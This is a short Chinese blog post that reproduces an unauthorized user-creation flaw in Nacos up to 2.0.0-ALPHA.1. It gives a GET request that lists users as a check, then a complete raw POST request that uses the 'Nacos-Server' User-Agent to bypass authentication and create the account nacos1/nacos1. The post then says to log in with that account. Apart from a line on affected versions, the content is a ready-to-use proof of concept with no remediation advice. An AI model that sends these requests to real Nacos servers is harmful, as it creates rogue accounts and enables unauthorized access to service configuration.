Nacos未授权添加用户漏洞
影响范围:
Nacos <= 2.0.0-ALPHA.1
漏洞复现:
检测漏洞是否存在
POC:
/nacos/v1/auth/users?pageNo=1&pageSize=4
接下来可以尝试创建用户,useragent写成Nacos-Server
POC:
POST /nacos/v1/auth/users HTTP/1.1
Host: ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
username=nacos1&password=nacos1
创建成功,用创建的账户登录
本文作者:都吃泡芙
本文链接:https://www.cnblogs.com/pa0fu/p/18277392
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步